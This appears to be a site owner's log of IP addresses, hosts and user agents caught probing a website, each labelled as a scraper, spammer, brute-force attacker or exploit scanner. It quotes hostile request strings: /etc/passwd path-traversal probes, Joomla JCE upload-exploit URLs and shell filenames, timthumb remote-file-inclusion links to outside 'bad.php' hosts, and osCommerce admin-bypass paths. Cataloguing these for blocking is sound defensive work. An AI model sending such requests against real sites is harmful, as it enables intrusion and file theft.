1) Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Examples: 1) /content//images/stories/3xp.php
27.47.7.166 Host: China – Guangzhou China Unicom Guangdong Province Network
Looking for non-existent .zip and .rar files
68.82.252.144 Hostname: c-68-82-252-144.hsd1.pa.comcast.net
Host: United States – Ivyland Comcast Cable Communications Inc.
Web server: 2 websites – cybercaffeinate.com , thicketgate.com
URLChecker bot
User agent: URLChecker
210.5.47.203 Hostname: ns74.small-dns.com
Host: Malaysia – Kuala Lumpur Ipserverone – Web & Email Hosting
Web server: 627 websites
Hacker looking for multiple exploits including below and others
1) 724CMS SQL injection exploit
/section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Section&Module=../../../../../../../../../../etc/passwd%00
2) Factux SQL injection Exploit
/Factux/bon_suite.php?lang=../../../../../etc/passwd%00
217.170.166.107 Hostname: host-217-170-166-107.biz.net-inotel.pl
Host: Poland – Kozieglowy Inotel S.a.
Web server: 1 website – kozieglowy.com.pl
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
107.20.8.42 Hostname: ec2-107-20-8-42.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
FAKE USER AGENT.
This bot uses your domain name as a user agent.
Referrer is http: //netcomber.com
Another bad bot hosted by Amazon (AWS)
68.233.247.157 Hostname: 68-233-247-157.static.hvvc.us
Host: United States – Tampa Noc4hosts Inc.
Scraper bot
User agent: Nutch12/Nutch-1.2
14.139.236.213 Hostname: website.iiita.ac.in
Host: India – Allahabad Indian Institute Of Information Technology Allahabad
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
3) //images/stories/food/footer.php?clone
46.105.28.232 Hostname: vps18807.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 44 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
210.253.110.34 Hostname: xcaret.co.jp
Host: Japan – Tokyo Gmo Internet Inc
Web server: 1 website – xcaret.co.jp
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Examples: 1) //images/stories/3xp.php
94.76.213.67 Hostname: bluefish2.dediboxes.co.uk
Host: United Kingdom – Maidenhead Simply Transit Ltd
Web server: 117 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
195.88.203.179 Host: Netherlands – Rotterdam W3media B.v.
Web server: 7 websites
WordPress dictionary attack
91.250.97.205 Hostname: www. myinternetservice.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 19 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/barner.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
87.238.192.95 Hostname: sh2095.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Web server: 1597 websites
Hacker Looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) URL&sa=U&ei=thXMUtqfOejl4QTnx4GQCw&ved=0CI4BEBYwFg&usg=AFQjCNEgY1VYU-EAVNA1SzZ9TtZU2o_PVA//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
54.205.42.236 Hostname: ec2-54-205-42-236.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
SPY BOT WARNING: FAKE USER AGENT.
This bot uses your domain name as a user agent.
Referrer is http: //netcomber.com
Another bad bot hosted by Amazon (AWS)
173.233.80.162 Hostname: 173-233-80-162.STATIC.turnkeyinternet.net
Host: United States – Latham Turnkey Internet Inc
Web server: 38 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) /images/stories/vito.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
207.106.190.66 Hostname: gw2.zoominfo.com
Host: United States – Andover Zoominfo – Data Center
NextGenSearchBot
Zoominfo scraper
67.23.224.89 Hostname: server.businessproweb.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 666 websites
Dictionary attacker
Trying to login to WordPress with username “admin”
66.135.60.214 Host: United States – San Antonio Serverbeach
Web server: 207 websites
Dictionary attacker
Trying to login to WordPress with username “admin”
91.215.216.42 Hostname: everest.icnhost.net
Host: Bulgaria – Plovdiv Internet Corporated Networks Ltd.
Web server: 207 websites
DoS type RFI attack from this IP looking for known Bigace exploit:
/system/admin/include/upload_form.php?GLOBALS=(malicious script)
194.109.22.86 Hostname: whl-www6.xs4all.net
Host: Netherlands – Amsterdam Xs4all Servers
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) //images/stories/dor/dor.php?clone
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
176.9.155.226 Hostname: 176-9-155-226.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
SISTRIX Crawler:
UA: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
188.40.12.61 Hostname: server3.myadeska.de
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 364 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) /images/stories/nob0dy.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
190.199.94.38 Hostname: 190-199-94-38.dyn.dsl.cantv.net
Host: Venezuela – Caracas Cantv Servicios Venezuela
Comment spammer
80.190.174.200 Host: Germany – Nuremberg Webagentur Speed-server.de
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) //images/stories/wawalo.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2.228.105.131 Hostname: 2-228-105-131.ip191.fastwebnet.it
Host: Italy – Chieti Sinet
Web server: 22 websites
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Aggregate/timthumb.php?src=http: //flickr.com.tr.realityinformatica.com%2Fbad.php
216.229.64.92 Hostname: hoteltravelmovie.de
Host: Germany – Berlin Strato Ag
Hacker: Known hacker bot user agents:
1) Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Looking for Joomla JCE exploit
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
88.208.96.152 Host: Czech Republic – Prague Otidea A.s.
Web server: 17 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
1) //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20& etc
85.214.139.113 Hostname: hoteltravelmovie.de
Host: Germany – Berlin Strato Ag
Web server: 18 websites
Hacker: Looking for Joomla JCE exploit
Examples: 1) /images/stories/3xp.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
User agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
212.85.153.14 Hostname: emile.lost-oasis.net
Host: France – Marseille Neuronnexion
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Looking for Joomla JCE exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
176.9.139.112 Hostname: 176-9-139-112.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
SISTRIX bot:
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
80.246.53.13 Host: Germany – Grub Am Forst Webspace Verkauf.de
Web server: 549 websites
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/barner.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
155.207.200.89 Hostname: bf6.csd.auth.gr
Host: Greece – Thessaloniki Aristotle University Of Thessaloniki
Bad user agent: python-requests/0.12.1
205.134.253.13 Hostname: elite633.inmotionhosting.com
Host: United States – San Francisco Inmotion Hosting
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) //images/stories/localhost.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
199.116.78.83 Hostname: lamp17-out.cloudaccess.net
Host: United States – Warren Cloudaccess.net Llc
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/edan.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
5.9.219.166 Hostname: hosted-by.reliablesite.net
Host: Germany – Gunzenhausen 01cloud
Hacker: Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/xnight.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
64.237.45.114 Hostname: hosted-by.reliablesite.net
Host: United States – Greenwich Reliablesite.net Llc
(Choopa, LLC)
Scraper bot: RSSingBot (http: //www.rssing.com)
159.148.74.62 Hostname: ews47.everyware.ch
Host: Latvia – Riga I-net Sia
Web server: 2 websites – cxo.lv , marinestandard.lv
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
49.156.148.228 Host: India – Kakinada Using In Hyd Noc Some sort of rogue bot
Identifies itself as a browser user agent Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 then behaves like a bot.
Crawled scripts and images, read robots.txt and looked for humans.txt
194.150.113.89 Host: Denmark – Randers Dandomain Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
202.191.56.207 Host: Viet Nam – Ha Noi Hanoi University Of Technology
Web server: 1 website – spr-project.org
Looking for Joomla JCE exploit
//images/stories/3xp.php
123.30.175.100 Hostname: static.vdc.vn
Host: Viet Nam – Ha Noi Vietnam Data Communication Company
coccoc bot
User Agent: Mozilla/5.0 (compatible; coccoc/1.0; +http: //help.coccoc.com/)
192.241.132.27 Host: United States – New York City Digital Ocean Inc.
Web server: 1 website – musaper.com
Malicious bot: Wget/1.13.4 (linux-gnu)
212.85.153.14 Hostname: emile.lost-oasis.net
Host: France – Marseille Neuronnexion
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
212.71.111.47 Hostname: ews47.everyware.ch
Host: Switzerland – Wil Everyware Ag
Web server: 144 websites
Attack on wp-admin
208.113.186.109 Hostname: habersham.dreamhost.com
Host: United States – San Francisco New Dream Network Llc
Attack on wp-admin
Probably a web server IP (Dreamhost)
98.130.0.212 Host: United States – Columbus Ecommerce Corporation Attack on wp-admin
81.215.38.71 Hostname: p3nw8shg322.shr.prod.phx3.secureserver.net
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Attack on wp-admin
208.89.208.127 Host: United States – Kansas City Dnsslave.com
VIRPUS – DNSSLAVE.COM
Multiple attempts to join/register using common signup URLs for various CMS
Bad host – VIRPUS
50.115.172.246 Host: United States – Kansas City Dnsslave.com
VIRPUS – DNSSLAVE.COM
Multiple attempts to join/register using common signup URLs for various CMS
Bad host – VIRPUS
184.168.46.68 Hostname: p3nw8shg322.shr.prod.phx3.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 2961 websites
Hotlinker – imagelucidity.com
198.20.89.250 Hostname: server.maximagroup.net
Host: United States – Chicago Singlehop Inc.
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE exploit
Examples: 1) //images/stories/tmp.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
75.126.41.92 Hostname: 75.126.41.92-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Unwanted bot: spotinfluence
User agent: spotinfluence/Nutch-1.4 (Spot Influence crawler; http: //spotinfluence.com; hello at spotinfluence dot com)
95.85.1.108 Host: Russian Federation – Moscow Llc Sirius
Digital Ocean, Inc
Digital Ocean “SEO” spy bot user agent: updown_tester
92.61.36.95 Hostname: ltvnsplsk4.hostex.lt
Host: Lithuania – Vilnius Uab Hostex
Web server: 513 websites
Webserver
No user agent included in request header
No referrer
207.241.226.94 Hostname: wwwb-redis0.us.archive.org
Host: United States – Houston Internet Archive
User Agent: Jakarta Commons-HttpClient/3.1
Archive.org bots are nothing but a nuisance. Will try to load ancient scripts and stylesheets
185.14.187.79 Host: Netherlands – Amsterdam Digital Ocean Inc. Digital Ocean “SEO” spy bot user agent: updown_tester
141.0.170.143 Host: Netherlands – Amsterdam Serverstack Digital Ocean “SEO” spy bot user agent: updown_tester
192.81.222.248 Host: Netherlands – Amsterdam Digital Ocean Inc. Digital Ocean “SEO” spy bot user agent: updown_tester
198.199.81.54 Host: United States – New York City Digital Ocean Inc. Digital Ocean “SEO” spy bot user agent: updown_tester
91.150.173.2 Host: Poland – Rzeszow Netres S.c.
Web server: 2 websites – soknet.pl , wave-net.pl
Attack on wp-login with username admin
114.129.33.79 Hostname: accobrandsasia.com
Host: Singapore – Iconz-webvisions Pte. Ltd.
Web server: 6 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
84.47.186.27 Host: Russian Federation – Moscow Llc Nauka-svyaz
Web server: 34 websites
Hacker looking for various ajax exploits
Examples:
1) /fckeditor/editor/plugins/ajaxfilemanager/ajax_create_folder.php
2) /includes/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php
3) /photo/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php
93.174.125.94 Hostname: 125-94.eport.gr
Host: Greece – Athens Prokopiou A. Toulkaridis X. O.e.
Web server: 81 websites
Hacker:
Fake user agents:
1) Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
Looking for Joomla JCE exploit
Examples: 1) //images/stories/zoneh.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
3) //images/stories/myblack.php
109.194.33.139 Hostname: 109x194x33x139.static-business.tomsk.ertelecom.ru
Host: Russian Federation – Tomsk Cjsc Er-telecom Holding
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.10.120.159 Hostname: 5e0a789f.bb.sky.com
Host: United Kingdom – London Sky Broadband
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.75.253.189 Hostname: euve2351.vserver.de
Host: Germany – Hurth Intergenia Ag
Web server: 3 websites
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
79.174.66.14 Hostname: 2493.ovz37.hc.ru
Host: Russian Federation – Moscow Hosting Center Ltd.
Web server: 1 website – zoogoods.ru
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
96.31.70.5 Hostname: lists.hgtms.com
Host: United States – Tampa Noc4hosts Inc.
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
189.254.253.18 Hostname: lac.moz.com.mx
Host: Mexico – Zihuatanejo Uninet S.a. De C.v.
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
50.30.43.228 Hostname: usve1477.vserver.de
Host: United States – Saint Louis Hosting Solutions International Inc.
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
37.191.217.97 Hostname: host-37-191-217-97.lynet.no
Host: Norway – Oslo Lynet Internett As
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
189.108.102.134 Hostname: 189-108-102-134.customer.tdatabrasil.net.br
Host: Brazil – Catanduva Fundacao Padre Albino
Web server: 1 website – webfipa.com.br
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
177.106.135.242 Hostname: 177-106-135-242.xd-dynamic.ctbcnetsuper.com.br
Host: Brazil – Uberlandia Companhia De Telecomunicacoes Do Brasil Central
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
200.160.125.17 Hostname: 200-160-125-017.static.spo.ctbc.com.br
Host: Brazil – Sao Paulo Ctbc Multimidia Data Net S/a
Hacker Botnet – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.236.197.10 Hostname: hosting.grapharts.cz
Host: Czech Republic – Prague Coolhousing S.r.o.
Web server: 34 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/romania.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
72.10.50.19 Hostname: eurmoma.it
Host: United States – New York City Media Temple Inc.
Web server: 1 website – eurmoma.it
Spammer – looking for xmlrpc.php
Example: URL/&sa=U&ei=fsW_Ur6SJsb0oAS4h4LoDg&ved=0CDwQFjAEOEY&usg=AFQjCNEiEmH7XZ9apMppiliRFW1Mu_RW3w/api/xmlrpc
46.20.43.10 Hostname: e241.enterprise.fastwebserver.de
Host: Germany – Dusseldorf Myloc Colocation/enterprise Line
Web server: 181 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/racrew.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
37.1.216.48 Host: Germany – End 3nt Solutions Llp Hacker looking for WordPress and site admin exploits
99.192.42.26 Hostname: sydnns0109w-099192042026.dhcp-dynamic.FibreOp.ns.bellaliant.net
Host: Canada – Sydney Bell Aliant/dsl-hsi
Hacker looking for Joomla JCE Editor exploit
/images/stories/zoneh.php
5.9.156.238 Host: Germany – Nuremberg Hetzner Online Ag Hacker scanning for admin exploit
/administrator/index.php
82.229.70.206 Hostname: crj95-1-82-229-70-206.fbx.proxad.net
Host: France – Tours Proxad/free Sas
Spambot: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
216.55.166.67 Hostname: server.gadgetsfactory.com
Host: United States – Lenexa Codero
Scanning for old WordPress Akismet plugin exploit vulnerability
81.47.175.201 Hostname: 201.Red-81-47-175.staticIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Web server: 9 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/3xp.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
182.73.254.222 Host: India – Hyderabad Cipher Cloud India Pvt Ltd Malicious user agent: Apache-HttpClient/4.0-beta2 (java 1.5)
216.55.143.51 Hostname: 216-55-143-51.dedicated.codero.net
Host: United States – Lenexa Codero
Web server: 9 websites
Malicious user agents:
1) Java/1.6.0_24
2) PHPCrawl
85.252.49.107 Hostname: linux7.fastname.no
Host: Norway – Tonsberg Customer Nets
Web server: 1586 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/bouncer.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
175.126.111.48 Host: Korea, Republic Of – Seoul Hanaro Telecom Brute force dictionary attack on wp-login.php with username “admin”
213.238.167.49 Hostname: 49-167-238-213.ip.idealhosting.net.tr
Host: Turkey – Istanbul Ideal Hosting Tic. Ltd. Sti.
Brute force dictionary attack on wp-login.php with username “admin”
198.58.81.202 Hostname: crayon.mysitehosted.com
Host: United States – Santa Rosa Arvixe Llc
Web server: 1 website – hrltcp.org
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2.139.176.44 Hostname: 44.Red-2-139-176.staticIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Web server: 1 website – contactophoto.com
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/vito.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
213.254.14.51 Host: Italy – Torino It.gate S.p.a.
Web server: 20 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
85.214.69.173 Hostname: h1442544.stratoserver.net
Host: Germany – Berlin Strato Ag
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /articles/images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
188.215.55.220 Hostname: host.robertorossi.ro
Host: Romania – Bucharest Sc Clax Telecom Srl
Web server: 3 websites
Brute force attack on site admin
92.103.79.51 Hostname: reverse.completel.net
Host: France – Paris Montrouge
Suspicious bot with user agent mozilla opera
89.174.7.138 Hostname: ebita-89-174-7-138-static.vps-i.pl
Host: Poland – Warsaw Gts Poland Sp. Z O.o.
Web server: 80 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
69.64.37.64 Hostname: eagle217.dedicatedpanel.com
Host: United States – Saint Louis Hosting Solutions International Inc.
Web server: 2 websites – purpalhazz.com , purpaltube.com
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.120.200.206 Host: Turkey – Emirgazi Dogan Tv Digital Platform Isletmeciligi A.s Dictionary attack on WordPress with user name “admin”
82.98.162.14 Host: Germany – Frankfurt Am Main 3nt Solutions Llp
Web server: 79 websites
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/plugins/wp-file-uploader/timthumb.php?src=http: //flickr.com.newwybarbie.com%2Fbad.php
82.98.162.14 Hostname: dl298.dinaserver.com
Host: Spain – Madrid Dinahosting S.l.
Web server: 1 website – itinere.coop
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/borong.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
117.120.1.146 Hostname: plsk.fivecube.net
Host: Singapore – Readyspace Infra And Dedicated Services
Web server: 4 websites
Hacker:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/borong.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
91.227.16.13 Hostname: srv3.host-food.ru
Host: Russian Federation – Llc Eximius
Web server: 859 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/explore.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
5.152.212.186
Hostname: h5-152-212-186.host.redstation.co.uk
Host: United Kingdom – Gosport Redstation Limited
